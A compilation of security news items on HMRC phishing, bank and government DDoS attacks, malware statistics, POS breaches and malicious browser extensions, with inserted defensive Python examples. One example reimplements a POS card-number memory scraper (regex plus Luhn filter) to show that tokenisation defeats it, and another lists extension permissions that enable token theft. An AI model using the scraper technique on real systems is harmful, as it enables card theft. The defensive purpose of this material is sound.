HMRC Phishing Messages Still a Threat, with Personal Information and Credentials the Target

As the Self Assessment tax return deadline looms in the UK, PhishMe has warned that phishing messages purporting to be from HM Revenue and Customs (HMRC) are circulating. While the number of campaigns* seen in 2015 decreased against previous years, the messages themselves still pose a threat because of their sophisticated and devious nature. One recent deviation is worth noting: instead of spreading malware, the scammers are trying to trick individuals directly into handing over their personal information.

The research team at PhishMe has seen a great number of these phishing emails over the last several years, according to threat analysts Ronnie Tokazowski, Heather McCalley and Brendan Griffin. Ronnie explains, “HMRC spoofed messages have been circulating for a number of years. With the deadline for self-assessment in the UK this weekend, the opportunity for scammers to spoof unsuspecting individuals under pressure to file their return before the cut-off point is a real possibility once again. In recent months we’ve seen two separate HMRC-inspired campaigns circulating that were both used to deliver malware: Pony, a password stealer, and a key-logger that records what a person types on the keyboard. In 2015 there was a definite spike in HMRC messages during the first four months of the year and, while data is still being collected for 2016, we envisage that spammers will be looking to capitalise on the UK’s tax season once again.”

Once the deadline has passed, scammers often change tactics and try to lure users with messages about rebates, a theme PhishMe has already seen tried, according to Heather: “Last February, scammers adapted their messages with the promise of a refund as a result of overpaid tax. However, instead of secreting malware, the messages were a credential phish seeking to collect personal information under the guise of HMRC contact. The recipient is encouraged to complete the return to claim the rebate; however, having completed and ‘submitted’ the form, all the details are delivered to the cyber-criminals via the Internet, and not to HMRC. From this point, instead of receiving money, it’s likely that the criminals will use the collected data to use the person’s identity for illicit gain.”

Heather continues, “Of course, it isn’t just tax season when HMRC scams circulate. A few months back, in November, we saw a campaign circulating where the criminals had spent time creating a spoof HMRC website that was quite intricate and looked legitimate to the untrained eye. The underlying code of the page caused the information entered to be delivered once again to fraudsters.”

Brendan concludes, “Phishers are continuously looking for ways to spread malware and collect personal information that they can monetise. In fact, while a Visa or MasterCard is worth $4 on the black market, a person’s date of birth can be traded for as much as $11. If a criminal has the complete package – so National Insurance number, date of birth and credit card details – as the scams above tried to collect, that can fetch $30.”

If you receive a message and are unsure of its legitimacy, HMRC publishes advice on recognising phishing emails, together with a list of the genuine digital and other contact it has issued, here.

* A ‘campaign’ refers to each unique wave of an email, not the volume of messages circulating. In 2015, PhishMe identified 22 campaigns compared with 38 in 2014, a decrease of roughly 40%. Despite these small numbers, the values are still statistically significant.
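The rebate lure described above works because the form on the spoofed page submits whatever the victim types to the criminals rather than to HMRC. The following is an added example, not PhishMe’s code or anything from the campaigns described: it parses a constructed lookalike page (the host name hmrc-rebate.example and the collector host collect.example.net are assumptions for the example) and flags any form that collects identity or payment fields but posts them to a host other than the page’s own.

```python
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Field-name fragments that mark a form as collecting identity or payment data
# (constructed list for this example)
SENSITIVE_FRAGMENTS = ("passw", "card", "cvv", "nino", "insurance", "dob", "birth", "sort")


class FormCollector(HTMLParser):
    """Collect every <form> with its action and the names/types of its <input> fields."""

    def __init__(self):
        super().__init__()
        self.forms = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        if tag == "form":
            self._current = {"action": a.get("action", ""), "fields": []}
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            self._current["fields"].append((a.get("name", "").lower(), a.get("type", "text").lower()))

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def find_offsite_credential_forms(html, page_host):
    """Flag forms that collect sensitive fields and submit them to a host other than the page's own."""
    parser = FormCollector()
    parser.feed(html)
    findings = []
    for form in parser.forms:
        target_host = urlsplit(form["action"]).hostname  # None for relative actions
        offsite = target_host is not None and target_host.lower() != page_host.lower()
        sensitive = [name for name, typ in form["fields"]
                     if typ == "password" or any(frag in name for frag in SENSITIVE_FRAGMENTS)]
        if offsite and sensitive:
            findings.append({"action": form["action"], "fields": sensitive})
    return findings


# Constructed lure page for this example: the lookalike is served from
# hmrc-rebate.example (assumed name) but its refund form posts to a different host.
LURE_PAGE_HOST = "hmrc-rebate.example"
LURE_PAGE_HTML = """
<html><body>
<h1>HM Revenue &amp; Customs - Tax Refund</h1>
<form method="post" action="http://collect.example.net/submit.php">
  <input type="text" name="full_name">
  <input type="text" name="nino">
  <input type="text" name="dob">
  <input type="text" name="card_number">
  <input type="text" name="expiry">
  <input type="password" name="cvv">
  <input type="submit" value="Claim refund">
</form>
<form method="get" action="/search">
  <input type="text" name="q">
</form>
</body></html>
"""

if __name__ == "__main__":
    for hit in find_offsite_credential_forms(LURE_PAGE_HTML, LURE_PAGE_HOST):
        print("suspicious form posting to", hit["action"], "with fields", hit["fields"])
```

The search form with a relative action is not reported, because it neither leaves the host nor collects anything sensitive. The check only catches the off-host pattern; a criminal who hosts both the lure and the collector on the same domain defeats it, so in practice it is combined with a check of whether that domain is HMRC’s at all.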




HSBC hit by DDoS attack. How safe is your bank account?

Earlier today, it was reported that banking giant HSBC had been hit by a distributed denial-of-service (DDoS) attack against its systems, stopping customers from accessing their online accounts.

Robert Capps, VP of business development at NuData Security, answered some questions regarding the attack.

How safe is your bank account?

“It’s incredibly important to understand that distributed denial-of-service (DDoS) attacks are not direct attacks on the accounts at financial institutions; they are attacks on the public image of, and consumer goodwill towards, those institutions. They are meant to harass, intimidate and embarrass a targeted institution, but DDoS attacks rarely result in any lasting impact on individual accounts at an institution.”

How safe is online banking?

“Online banking is still incredibly safe for individual consumers, and brings with it a level of convenience and direct visibility that has long been absent from traditional banking channels. At one time, you may not have known about improper access or transactions on a financial account until the bill or statement came at the end of the month. DDoS attacks are not meant to directly steal from consumers; they are meant to deny them access to the institution through one of the most convenient and consumer-friendly methods we’ve devised to date. It’s important to understand that bank accounts remain available via other channels, even during a crushing DDoS attack, and consumers may visit a bank branch, place a phone call to their bank, or use their normal payment cards during such an attack.”

How safe are modern bank accounts?

“They are incredibly safe, and with the deployment of modern and emerging security features, are becoming even safer. As we make access to financial institutions even more convenient for the average consumer, we also make attacking them much easier for an individual or group with malicious intent. While the latter is unwanted, it’s a cost of creating an open and accessible financial system that allows for the growth and prosperity we’ve witnessed over the last 20 years.”

What sort of systems are in place to protect them and are they vulnerable?

“Sadly, there are few effective systems to fully protect institutions from the effects of a DDoS attack.  This is an unfortunate by-product of how the Internet itself was designed decades ago.  The reality of the situation is that the tools available to commit such an attack are available to a marginally sophisticated attacker, for a few hundred dollars, and a few hours of their time.

There are a few additional issues to be worried about beyond the initial impact to the image of an online institution during a DDoS attack. In recent years, we’ve seen DDoS attacks against banks used as a smokescreen and cover for other nefarious activities such as cyber-heists at a targeted institution. They are sometimes meant to draw the attention of a financial institution’s information security teams away from the real intent of the attacks, such as large-value money transfers or the bulk theft and removal of consumer account data. Only time will tell if the HSBC cyber attack is simply a DDoS attack or a cover for a much more damaging intrusion into their systems.”



27% of all recorded malware appeared in 2015

PandaLabs, the R&D laboratory of Panda Security, both detected and neutralized more than 84 million new malware samples throughout 2015. This is nine million more than the previous year, according to the corresponding data. The figure means that, on average, 230,000 new malware samples appeared every day over the course of the year.

Last year saw the greatest number of new malware samples ever recorded around the world. With the all-time total now at 304 million samples, more than a quarter of all malware samples ever recorded were produced in 2015 (27.63%).

It was also a difficult year for multinational companies and governments alike who suffered large scale data theft and interference on their IT systems.

“We predict that the amount of malware created by cybercriminals will continue to grow”, says Luis Corrons, Technical Director of PandaLabs, “we also can’t forget that the creation of millions of Trojans and other threats corresponds to the cybercriminals’ needs to infect as many users as possible in order to get more money”.

Most powerful malware of 2015: Trojans and PUPs

In 2015 we saw that Trojans, PUPs (Potentially Unwanted Programs) and distinct families of Cryptolocker spread fear among larger businesses worldwide through massive attacks and the theft of thousands of confidential files.

Trojans continued to be the main source of malware (51.45%), comfortably positioned ahead of the rest of the collected samples: viruses (22.79%), followed by worms (13.22%), PUPs (10.71%) and spyware (1.83%).

Cryptolocker (a type of ransomware) was the main protagonist of cyberattacks throughout the year. According to Corrons, “Cryptolocker is the best bet for cybercriminals, as it is one of the easiest ways of getting money. Also, it has shown itself to be very effective, especially in the case of businesses that don’t think twice about paying to recover their stolen information”.

Biggest infections caused by Trojans

Among all types of malware that caused large-scale infections worldwide, Trojans had the highest infection rate (60.30%), albeit 5% down on the figure for 2014.

PUPs were also particularly harmful: nearly a third of infections involved PUPs that used deceptive techniques to get onto the targeted PCs, far ahead of adware/spyware (5.19%), worms (2.98%) and viruses (2.55%).

China remains one of the most infected countries in the world

Last year was notable for having the highest rate of computer infections yet recorded. Geographically, China was the country with the most infected computers (57.24%), nearly 30% more than in 2014. Taiwan was next, with an infection rate of 49.15%, followed by Turkey (42.52%). These three countries remain at the top of the infection-rate rankings, just as they were in 2014 and 2013.

Other countries that registered an infection rate that was above the global average included Colombia (33.17%), Uruguay (32.98%), and Spain (32.15%).

Nordic countries register the lowest rate of infection

Of the ten countries with the lowest rates of infection, nine were in Europe; Japan was the only country outside the continent.

The Nordic countries occupied the top positions: Finland was ahead of the rest with a rate of 20.32%, followed by Norway (20.51%) and Sweden (20.88%), then the UK at 21.34%.

The year at a glance, and trends for 2016

PandaLabs notes that while Flash Player is gradually being phased out, other attack methods are always ready to fill the gap. Advanced phishing, social media, mobile devices, the Internet of Things (IoT) and cyber-espionage are covered in more detail in that section of the PandaLabs report.

The full PandaLabs 2015 Annual report is attached and more information can be found at



Wendy’s reports possible credit card breaches at multiple restaurants

In response to last night’s news of a possible customer data breach at Wendy’s, George Rice, senior director, payments at HPE Security – Data Security, commented:

“More than ever, retailers must put data security at the top of their priority lists. Common approaches to security may no longer be secure as criminals are armed with increasingly effective malware and hacking tools. At the same time, retail innovations such as EMV, mobile payments and mobile wallets enhance the customer experience but may also introduce security vulnerabilities for the merchant.

Retailers should develop security strategies that meet the highest cryptographic standards, are easy to maintain and allow for continuous advancement of the merchant’s payment ecosystem.

We recommend a data-centric approach to data security that uses format preservation. This allows for sensitive data to be protected at the moment of acceptance and remain protected throughout its lifecycle in the organisation.

Retail malware is typically designed to steal clear data in memory from Point of Sale (POS) applications, resulting in the loss of magstripe data, EMV card data or other sensitive data exposed at the point of sale. And unfortunately, POS systems are often the weak link in the chain — they should be isolated from other networks, but often are connected. A checkout terminal in constant use is usually less frequently patched and updated, and is thus vulnerable to all manner of malware compromising the system to gain access to cardholder data.

Fast-food outlets, and any business using POS systems, can avoid the impact of these types of advanced attacks. Proven methods are available to neutralize data from breaches, whether at the card reader, at the point of sale, in person or online. Leading retailers and payment processors have adopted these data-centric security techniques with huge positive benefits: reduced exposure of live data to advanced malware during an attack, and reduced impact of increasingly aggressive PCI DSS 3.1 compliance enforcement laws aimed at making data security a ‘business as usual’ matter for any organization handling card payment data.

The good news is that savvy merchants are already tackling this risk and giving the malware nothing to steal through solutions that also have a dramatic cost reducing benefit to PCI compliance. Encrypting the data in the card reading terminal ahead of the POS eliminates the exposure of live information in vulnerable POS systems. The attackers get only useless encrypted data.”

Rice offers these tips for retailers:

“Only collect customer data that you need and can adequately protect. Why do you need date-of-birth or social security numbers, for example? Encrypt or tokenize everything you determine to be mission-critical.

Protect data at the moment of submission by the customer. Criminals know to embed malware near to data acceptance points, like point-of-sale systems or web front-ends.

Only unprotect data when absolutely necessary.  A high percentage of the time, applications and users can work equally well with a surrogate value.”
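Rice’s point is that memory-scraping POS malware harvests card numbers that sit in the clear in the POS application’s memory, and that encrypting in the card reader or tokenizing at acceptance leaves it nothing usable. The block below is an added example, not HPE’s code or any vendor’s scheme: it builds a simple scraper of the kind described (a digit-run regex with a Luhn filter, which is how such malware discards false positives) and runs it over two constructed memory images, one holding the PAN in the clear and one holding a format-preserving surrogate issued by a vault kept off the POS. The test PAN 4111111111111111 is a widely published Visa test number, and the surrogate scheme (BIN and last four kept, middle randomised, Luhn-invalid by construction) is an illustration of the idea rather than FF1/FF3 or a product’s algorithm.

```python
import re
import secrets

# Constructed inputs for this example. 4111111111111111 is a widely published
# Visa test number, not a live card.
TEST_PAN = "4111111111111111"


def luhn_valid(digits):
    """Mod-10 (Luhn) check used by card numbers; RAM scrapers use it to drop false positives."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:
            d = d * 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0


def scan_for_pans(buffer):
    """What POS memory-scraping malware does: find 13-19 digit runs, keep the Luhn-valid ones."""
    hits = []
    for m in re.findall(rb"(?<!\d)\d{13,19}(?!\d)", buffer):
        candidate = m.decode("ascii")
        if luhn_valid(candidate):
            hits.append(candidate)
    return hits


class TokenVault:
    """Format-preserving tokenisation kept OFF the POS: the card reader sends the PAN to the
    vault and only the surrogate ever sits in POS memory. This is an illustration for the
    example, not FF1/FF3 or any vendor's scheme (assumption)."""

    def __init__(self):
        self._token_to_pan = {}

    def tokenize(self, pan):
        if not pan.isdigit() or not luhn_valid(pan):
            raise ValueError("not a well-formed PAN")
        while True:
            # keep BIN (first 6) and last 4 so receipts and reports still work,
            # randomise the middle, and reject tokens that pass Luhn so a scraper's
            # filter discards them and they can never be mistaken for a real PAN
            middle = "".join(secrets.choice("0123456789") for _ in range(len(pan) - 10))
            token = pan[:6] + middle + pan[-4:]
            if token != pan and not luhn_valid(token) and token not in self._token_to_pan:
                self._token_to_pan[token] = pan
                return token

    def detokenize(self, token):
        return self._token_to_pan[token]


def pos_memory(card_value):
    """Constructed stand-in for a POS application's working memory holding one transaction."""
    return b"TRACK2=" + card_value.encode("ascii") + b"=2512101\x00AMOUNT=1299\x00TERM=0042\x00"


if __name__ == "__main__":
    vault = TokenVault()
    token = vault.tokenize(TEST_PAN)
    print("clear POS memory leaks:", scan_for_pans(pos_memory(TEST_PAN)))
    print("tokenised POS memory leaks:", scan_for_pans(pos_memory(token)))
    print("vault still maps token back:", vault.detokenize(token) == TEST_PAN)
```

Run against the clear image the scraper recovers the PAN; run against the tokenised image it recovers nothing, while the vault (which lives on the tokenization service, not on the terminal) can still map the surrogate back for settlement or refunds. A scraper that skips the Luhn filter would still pick up the 16-digit surrogate, but it is worthless without the vault, which is the point Rice makes.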

Simon Crosby, CTO and co-founder at Bromium, added:

“Many Point of Sale systems have not been upgraded for years, and in anticipation of ‘chip and sign’ changes to credit cards, some vendors have held off even longer, waiting for the latest technology before they upgrade. A simple rule of thumb: if a vendor does not support chip and sign, pay cash.”



Newly published report from BSI can help prepare for the future of Big Data

BSI, the business standards company, has published a Big Data research report to establish the role that standards can play in this emerging market. The Centre for Economic and Business Research (CEBR) estimates that Big Data will benefit the UK economy to the tune of £216 billion by 2017 and result in the creation of 58,000 new jobs.

Organizations have always produced large quantities of data, but the economically-viable ability to store and analyse exponentially growing volumes of data is new, and this is what the term “Big Data” represents. There is very little standardization activity in this area. To address this, external research conducted by Circle Research examined the market for Big Data standards. This included mapping the current Big Data market to identify high potential industries where there is a need for best practice, in addition to qualitative research comprising interviews with industry professionals, academics, government representatives and consumer bodies. The report also features pertinent quotes from organizations contacted for the study.

The report identified a series of challenges for the growth of the Big Data market which also represent an opportunity to develop standardization in this area.

Anne Hayes, Head of Market Development for Governance & Risk at BSI, said: “There are a series of challenges that organizations carrying out Big Data projects are facing. This research has developed a list of areas where there is initial agreement that the UK can take the lead on developing impactful best practice. BSI will work with key stakeholders in the UK and internationally to develop standards to help UK organizations reap the benefits of Big Data.”

Potential areas of standardization:

‘How to’ guide for Big Data projects. This would include best practice to help formulate projects, determine who should be involved, define the objectives and ensure quality checks are in place.

Meta-data. The importance of meta-data is generally seen to be growing; however, many organizations struggle to capture and store meta-data in a usable and consistent format. Furthermore, there is a lack of guidance on areas such as how to ensure meta-data quality and how long it should be stored for.

Big Data communications.  In recent years there have been cases of Big Data initiatives failing to take-off due to public resistance. Many experts believe the problem lies in a failure to adequately explain to customers/the public the potential societal benefits of using Big Data analytics. Standardization could help to develop best practice for how Big Data initiatives should be explained and communicated to ensure a positive case for Big Data is presented to the public.

Terms and conditions. Building public trust in the use of their data is essential. However, T&Cs are often confusing, ambiguous and wordy. Any organization with clear and easy-to-understand T&Cs will be at a competitive advantage. Standards could help by ensuring T&Cs are simple to understand and by optimizing informed consent before data is used in Big Data projects.

The full report is available to download here.



Irish National Lottery website and ticket machines were targeted by a cyber-attack

The Irish National Lottery website and ticket machines were targeted by a cyber-attack intended to disrupt operations. Investigations into the incident are still ongoing. Dave Larson, Chief Operating Officer of Corero Network Security, provided the following expert opinion to @DFMag:

“Denial of Service attacks have been a threat to service availability for more than a decade. However, more recently these attacks have become increasingly sophisticated and multi-vector in nature, overcoming traditional defense mechanisms or reactive countermeasures.

“The growing dependence on the Internet makes the impact of successful DDoS attacks – financial and otherwise – increasingly damaging. The gaming, and gambling sectors would appear to be higher risk targets, due to the nature of the business. 

“Enterprises must then harden the network edge against such attacks. Automatic detection and mitigation of attack traffic allows online properties and technical infrastructure to remain available in the wake of a DDoS event.” 



New twist to Dridex banking malware

It has been discovered that an updated version of the Dridex banking malware uses a Domain Name System (DNS) trick to direct victims to fake banking websites: even if a user types the bank’s correct domain name, the fake website is what appears in the browser.

Tim Erlin, Director of IT Security and Risk Strategy for Tripwire says, “We implicitly trust that the address we type into the browser is the website we get, but DNS redirection exploits that trust. There are, in fact, multiple systems involved in turning that web address into an actual destination for your requests. The best way to prevent this kind of attack is to avoid the initial malware infection. While the malware itself may be advanced, the initial infection occurs via simple phishing.”
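Erlin’s point is that several systems sit between the name a user types and the address the browser connects to, and any of them can be made to answer differently. The report does not say which part of that chain Dridex tampers with, so the following added example (not Tripwire’s code or anything from the malware) assumes two of the places an infected machine could be steered from and checks both over constructed data: a hosts-file entry pinning a bank hostname to an address, and a local resolver answering with addresses that an independent reference resolver, queried out of band, never returns. The bank hostnames and all addresses are assumptions for the example.

```python
import ipaddress

# Constructed watch-list of banking hostnames (assumed names, not from the report)
WATCHED_DOMAINS = {"onlinebanking.example-bank.co.uk", "secure.example-bank.com"}

# Constructed hosts file: the third entry pins a bank hostname to an attacker-chosen address
SAMPLE_HOSTS_FILE = """
127.0.0.1       localhost
::1             localhost
203.0.113.10    onlinebanking.example-bank.co.uk   # not something an admin would add
"""

# Constructed answers: what the victim's resolver chain returns versus what an
# independent reference resolver returns for the same names
LOCAL_ANSWERS = {
    "onlinebanking.example-bank.co.uk": {"203.0.113.10"},
    "secure.example-bank.com": {"198.51.100.7"},
}
REFERENCE_ANSWERS = {
    "onlinebanking.example-bank.co.uk": {"198.51.100.5", "198.51.100.6"},
    "secure.example-bank.com": {"198.51.100.7"},
}


def hosts_overrides(hosts_text, watched):
    """Return {hostname: address} for watched names that a hosts file pins to an address."""
    overrides = {}
    for raw in hosts_text.splitlines():
        line = raw.split("#", 1)[0].strip()   # drop comments and surrounding whitespace
        if not line:
            continue
        addr, *names = line.split()
        try:
            ipaddress.ip_address(addr)
        except ValueError:
            continue                            # malformed line, not an override
        for name in names:
            if name.lower() in watched:
                overrides[name.lower()] = addr
    return overrides


def resolver_mismatches(local_answers, reference_answers):
    """Names whose local answer set shares no address at all with the reference answer set."""
    mismatches = {}
    for name, local in local_answers.items():
        reference = reference_answers.get(name, set())
        if not set(local) & set(reference):
            mismatches[name] = {"local": sorted(local), "reference": sorted(reference)}
    return mismatches


def check_host(hosts_text, local_answers, reference_answers, watched):
    """Combine both checks into one list of findings for a workstation."""
    findings = []
    for name, addr in hosts_overrides(hosts_text, watched).items():
        findings.append(f"hosts file pins {name} to {addr}")
    for name, detail in resolver_mismatches(local_answers, reference_answers).items():
        findings.append(f"resolver returns {detail['local']} for {name}, reference says {detail['reference']}")
    return findings


if __name__ == "__main__":
    for finding in check_host(SAMPLE_HOSTS_FILE, LOCAL_ANSWERS, REFERENCE_ANSWERS, WATCHED_DOMAINS):
        print("ALERT:", finding)
```

A mismatch is a prompt to investigate rather than proof of tampering: banks behind content-delivery networks legitimately hand different addresses to different resolvers. The decisive follow-up is whether the certificate the suspect address presents for the bank hostname validates against an untouched trust store, and, as Erlin says, the cheapest fix of all is not opening the phishing attachment in the first place.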



Multiple Irish government websites downed under DDoS attack

A number of Irish government-related and public sector websites were knocked offline by an apparent DDoS attack. Stephanie Weagle, Senior Director at Corero Network Security, a company that specialises in mitigating DDoS attacks, told @DFMag:

“The Irish Government infrastructure appears to be the target of cyber attack activity, specifically malicious DDoS events, impacting a variety of public sector website properties and rendering them inaccessible.

“Motivations for DDoS attacks are wide-ranging and sometimes random in nature. Regardless of the stimulus, the impact can be quite damaging. Traditional security solutions are no match for most DDoS attack vectors. Proactive and automatic DDoS protection should be a required layer of security for an enterprise infrastructure.

“In addition, DDoS attacks are increasingly being used as a smokescreen to hide even more malicious activity on the network. This should be a concern for the teams dealing with the attacks against the Irish Government network infrastructure.”



Browser Extensions are Prime Targets in the Threat Landscape

Craig Young, Cybersecurity Researcher for Tripwire says, “With so many critical business and financial activities occurring within the web browser, malicious extensions and add-ons must be considered a prime target for infection.  

As with browser interstitials warning of invalid SSL certificates, many users likely gloss over the permissions declaration when installing extensions or do not recognize the risk of allowing an extension to have access to read data from web sites.  The reality though is that extensions are allowed to run in a very privileged browser context giving access to authentication tokens as well as the ability to scan local networks.  Normally sites loaded within the browser are restricted from reading content from other sites via the same-origin policy.  This is what keeps an advertisement on a news site from transferring money out of the banking site open in another tab.  

Recently a number of gamers on the Steam platform learned this lesson the hard way as a number of malicious browser extensions were found to be stealing in-game items with real-world value.

Security organizations should educate employees on the risks of running browser extensions as well as auditing workstations for unapproved use.” 
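Young’s closing advice is to audit workstations for unapproved extensions, and the permissions he describes (access to read data from every site, and hence to session tokens) are declared in each extension’s manifest.json. The block below is an added example, not Tripwire’s tooling: it scores a manifest in either the Manifest V2 layout (host patterns mixed into "permissions") or the V3 layout ("host_permissions" separate) for broad host access, privileged API permissions and content scripts injected into every page, and includes a walker for an unpacked-extensions directory such as the Extensions folder inside a Chrome profile. The two manifests are constructed for the example; the permission names are the real Chrome/WebExtension ones, and the reasons attached to them are this example’s summaries.

```python
import json
from pathlib import Path

# API permissions worth a second look, with why (constructed list for this example;
# the permission names are the real Chrome/WebExtension ones)
RISKY_API_PERMISSIONS = {
    "cookies": "read/modify cookies, including session tokens, for permitted hosts",
    "webRequest": "observe every HTTP request and response the browser makes",
    "webRequestBlocking": "modify or block requests in flight",
    "tabs": "see the URL and title of every open tab",
    "history": "read browsing history",
    "clipboardRead": "read the clipboard",
    "nativeMessaging": "talk to a native helper process outside the browser sandbox",
    "debugger": "attach the DevTools protocol to pages",
    "proxy": "change proxy settings for all traffic",
}
# Match patterns that grant access to every site
BROAD_HOST_PATTERNS = {"<all_urls>", "*://*/*", "http://*/*", "https://*/*"}


def assess_manifest(manifest):
    """Return (kind, value, reason) findings for an extension manifest (MV2 or MV3 layout)."""
    findings = []
    permissions = manifest.get("permissions", [])
    # MV2 mixes host patterns into "permissions"; MV3 moves them to "host_permissions"
    host_patterns = [p for p in permissions if "://" in p or p == "<all_urls>"]
    host_patterns += manifest.get("host_permissions", [])
    for perm in permissions:
        if perm in RISKY_API_PERMISSIONS:
            findings.append(("api", perm, RISKY_API_PERMISSIONS[perm]))
    for pattern in host_patterns:
        if pattern in BROAD_HOST_PATTERNS:
            findings.append(("host", pattern, "can read and change every site the user visits"))
    for script in manifest.get("content_scripts", []):
        for pattern in script.get("matches", []):
            if pattern in BROAD_HOST_PATTERNS:
                findings.append(("content_script", pattern, "injects code into every page, inside that page's origin"))
    return findings


def audit_extension_root(root):
    """Walk an unpacked-extensions directory (e.g. a Chrome profile's Extensions folder)
    and assess every manifest.json found; returns {path: findings}."""
    report = {}
    for manifest_path in Path(root).rglob("manifest.json"):
        with open(manifest_path, encoding="utf-8-sig") as f:   # Chrome writes some with a BOM
            manifest = json.load(f)
        report[str(manifest_path)] = assess_manifest(manifest)
    return report


# Constructed manifests for this example
BENIGN_MANIFEST = {
    "manifest_version": 3,
    "name": "Docs helper",
    "permissions": ["storage"],
    "host_permissions": ["https://docs.example.com/*"],
    "content_scripts": [{"matches": ["https://docs.example.com/*"], "js": ["helper.js"]}],
}
GREEDY_MANIFEST = {
    "manifest_version": 2,
    "name": "Free Skins",
    "permissions": ["<all_urls>", "cookies", "webRequest", "webRequestBlocking", "tabs", "storage"],
    "content_scripts": [{"matches": ["*://*/*"], "js": ["inject.js"], "run_at": "document_start"}],
}

if __name__ == "__main__":
    for name, manifest in (("benign", BENIGN_MANIFEST), ("greedy", GREEDY_MANIFEST)):
        print(name, "->", assess_manifest(manifest) or "no findings")
```

The benign manifest produces no findings because everything it asks for is scoped to one host. The greedy one is the profile Young warns about: with <all_urls> plus cookies and webRequest it can read authentication tokens for any site the user is logged into, and a content script matched on every page runs inside each page’s origin, which is exactly the boundary the same-origin policy otherwise enforces. A finding is a reason to compare the extension against the approved list, not proof of malice.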



Kickass Torrents hit with DDoS attack

Kickass Torrents, the Internet’s biggest torrent portal, has suffered intermittent downtime over the last few days after an unknown attacker pummelled the site with a DDoS attack.

Dave Larson, Chief Operating Officer at Corero Network Security told @DFMag;

“This attack is a perfect example of the vulnerability of Domain Name Services when targeted with precision DDoS attacks.  DNS servers are central to the operation of the Internet at large and in many cases there is nothing standing between them and the raw Internet.  Organizations need to ensure that their own operated DNS servers, as well as the services they contract for with third party providers, are defended by always-on, in-line, automatic DDoS defense systems that can meet this challenge with a real-time response.  Otherwise, these systems represent an easy target to enable attackers to achieve significant outages with focused attacks.”